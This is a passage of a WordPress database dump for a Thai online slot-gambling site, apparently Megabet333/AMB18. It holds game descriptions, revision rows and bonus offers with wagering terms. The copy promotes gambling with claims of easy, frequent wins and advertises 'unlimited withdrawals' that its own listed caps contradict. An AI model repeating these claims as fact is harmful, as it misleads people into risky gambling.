จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p><p style=\"text-align: center;\"><a style=\"color: #ff6600;\" href=\"http://luca333.net\" target=\"_blank\" rel=\"noopener\"><strong>Luca333</strong></a></p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','publish','closed','closed','','home','','','2026-05-19 09:56:20','2026-05-19 09:56:20','',0,'https://megabet333.biz/?page_id=44',0,'page','',0),(45,3,'2025-10-22 10:04:20','2025-10-22 10:04:20','','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-22 10:04:20','2025-10-22 10:04:20','',44,'https://megabet333.biz/?p=45',0,'revision','',0),(46,3,'2026-02-26 19:06:23','2025-10-22 14:53:43','','AMB18','','publish','closed','closed','','megabet333','','','2026-02-26 19:06:23','2026-02-26 19:06:23','',0,'https://megabet333.biz/?p=46',1,'nav_menu_item','',0),(47,3,'2025-10-22 14:59:48','2025-10-22 14:59:48','<a href=\"https://megabetauto.com/auth/register\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"https://megabetauto.com/\" target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://mgbline.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','inherit','closed','closed','','32-revision-v1','','','2025-10-22 14:59:48','2025-10-22 14:59:48','',32,'https://megabet333.biz/?p=47',0,'revision','',0),(48,3,'2025-10-23 07:26:04','2025-10-23 07:26:04','','Megabet_333_Biz_-_Logo','','inherit','','closed','','megabet_333_biz_-_logo','','','2025-10-23 07:26:04','2025-10-23 07:26:04','',0,'https://megabet333.biz/wp-content/uploads/2025/10/Megabet_333_Biz_-_Logo.webp',0,'attachment','image/webp',0),(49,3,'2025-10-23 07:26:05','2025-10-23 07:26:05','','Character_slot_1_-_Megabet333-Biz','','inherit','','closed','','character_slot_1_-_megabet333-biz','','','2025-10-23 07:26:05','2025-10-23 07:26:05','',0,'https://megabet333.biz/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(50,3,'2025-10-23 07:26:06','2025-10-23 07:26:06','','3icon_-_Megabet333-Biz','','inherit','','closed','','3icon_-_megabet333-biz','','','2025-10-23 07:26:06','2025-10-23 07:26:06','',0,'https://megabet333.biz/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(51,3,'2025-10-23 07:26:07','2025-10-23 07:26:07','','Character_slot_2_-_Megabet333-Biz','','inherit','','closed','','character_slot_2_-_megabet333-biz','','','2025-10-23 07:26:07','2025-10-23 07:26:07','',0,'https://megabet333.biz/wp-content/uploads/2025/10/Character_slot_2_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(52,3,'2025-10-23 07:26:09','2025-10-23 07:26:09','','Character_slot_3_-_Megabet333-Biz','','inherit','','closed','','character_slot_3_-_megabet333-biz','','','2025-10-23 07:26:09','2025-10-23 07:26:09','',0,'https://megabet333.biz/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(53,3,'2025-10-23 07:26:10','2025-10-23 07:26:10','','79_Get_200_-_Megabet333-Biz','','inherit','','closed','','79_get_200_-_megabet333-biz','','','2025-10-23 07:26:10','2025-10-23 07:26:10','',0,'https://megabet333.biz/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(54,3,'2025-10-23 07:26:10','2025-10-23 07:26:10','','JILI_-_Megabet333-Biz','','inherit','','closed','','jili_-_megabet333-biz','','','2025-10-23 07:26:10','2025-10-23 07:26:10','',0,'https://megabet333.biz/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(55,3,'2025-10-23 07:26:11','2025-10-23 07:26:11','','JOKER_-_Megabet333-Biz','','inherit','','closed','','joker_-_megabet333-biz','','','2025-10-23 07:26:11','2025-10-23 07:26:11','',0,'https://megabet333.biz/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(56,3,'2025-10-23 07:26:11','2025-10-23 07:26:11','','Megabet_333_Biz_-_M_Logo','','inherit','','closed','','megabet_333_biz_-_m_logo','','','2025-10-23 07:26:11','2025-10-23 07:26:11','',0,'https://megabet333.biz/wp-content/uploads/2025/10/Megabet_333_Biz_-_M_Logo.webp',0,'attachment','image/webp',0),(57,3,'2025-10-23 07:26:12','2025-10-23 07:26:12','','Microgaming_-_Megabet333-Biz','','inherit','','closed','','microgaming_-_megabet333-biz','','','2025-10-23 07:26:12','2025-10-23 07:26:12','',0,'https://megabet333.biz/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(58,3,'2025-10-23 07:26:13','2025-10-23 07:26:13','','Pragmatic_-_Megabet333-Biz','','inherit','','closed','','pragmatic_-_megabet333-biz','','','2025-10-23 07:26:13','2025-10-23 07:26:13','',0,'https://megabet333.biz/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(59,3,'2025-10-23 07:26:14','2025-10-23 07:26:14','','PG_-_Megabet333-Biz','','inherit','','closed','','pg_-_megabet333-biz','','','2025-10-23 07:26:14','2025-10-23 07:26:14','',0,'https://megabet333.biz/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(60,3,'2025-10-23 07:26:14','2025-10-23 07:26:14','','search_megabet_333_-_Megabet333-Biz','','inherit','','closed','','search_megabet_333_-_megabet333-biz','','','2025-10-23 07:26:14','2025-10-23 07:26:14','',0,'https://megabet333.biz/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(61,3,'2025-10-23 07:26:15','2025-10-23 07:26:15','','Slot_demo_play_-_Megabet333-Biz','','inherit','','closed','','slot_demo_play_-_megabet333-biz','','','2025-10-23 07:26:15','2025-10-23 07:26:15','',0,'https://megabet333.biz/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(62,3,'2025-10-23 07:26:16','2025-10-23 07:26:16','','Slot_xo_-_Megabet333-Biz','','inherit','','closed','','slot_xo_-_megabet333-biz','','','2025-10-23 07:26:16','2025-10-23 07:26:16','',0,'https://megabet333.biz/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(63,3,'2025-10-23 07:33:08','2025-10-23 07:33:08','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2025-10-23 07:33:08','2025-10-23 07:33:08','',7,'https://megabet333.biz/?p=63',0,'revision','',0),(64,3,'2025-10-23 07:37:06','2025-10-23 07:37:06','','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:37:06','2025-10-23 07:37:06','',27,'https://megabet333.biz/?p=64',0,'revision','',0),(65,3,'2025-10-23 07:37:07','2025-10-23 07:37:07','','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:37:07','2025-10-23 07:37:07','',27,'https://megabet333.biz/?p=65',0,'revision','',0),(66,3,'2025-10-23 07:37:07','2025-10-23 07:37:07','','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:37:07','2025-10-23 07:37:07','',27,'https://megabet333.biz/?p=66',0,'revision','',0),(67,3,'2025-10-23 07:40:00','2025-10-23 07:40:00','','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:40:00','2025-10-23 07:40:00','',27,'https://megabet333.biz/?p=67',0,'revision','',0),(68,3,'2025-10-23 07:40:01','2025-10-23 07:40:01','','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:40:01','2025-10-23 07:40:01','',27,'https://megabet333.biz/?p=68',0,'revision','',0),(69,3,'2025-10-23 07:40:01','2025-10-23 07:40:01','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:40:01','2025-10-23 07:40:01','',27,'https://megabet333.biz/?p=69',0,'revision','',0),(70,3,'2025-10-23 07:40:52','2025-10-23 07:40:52','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:40:52','2025-10-23 07:40:52','',27,'https://megabet333.biz/?p=70',0,'revision','',0),(71,3,'2025-10-23 07:40:53','2025-10-23 07:40:53','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:40:53','2025-10-23 07:40:53','',27,'https://megabet333.biz/?p=71',0,'revision','',0),(72,3,'2025-10-23 07:40:53','2025-10-23 07:40:53','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:40:53','2025-10-23 07:40:53','',27,'https://megabet333.biz/?p=72',0,'revision','',0),(73,3,'2025-10-23 07:49:08','2025-10-23 07:49:08','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:49:08','2025-10-23 07:49:08','',27,'https://megabet333.biz/?p=73',0,'revision','',0),(74,3,'2025-10-23 07:49:08','2025-10-23 07:49:08','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:49:08','2025-10-23 07:49:08','',27,'https://megabet333.biz/?p=74',0,'revision','',0),(75,3,'2025-10-23 07:49:08','2025-10-23 07:49:08','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:49:08','2025-10-23 07:49:08','',27,'https://megabet333.biz/?p=75',0,'revision','',0),(76,3,'2025-10-23 07:50:52','2025-10-23 07:50:52','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 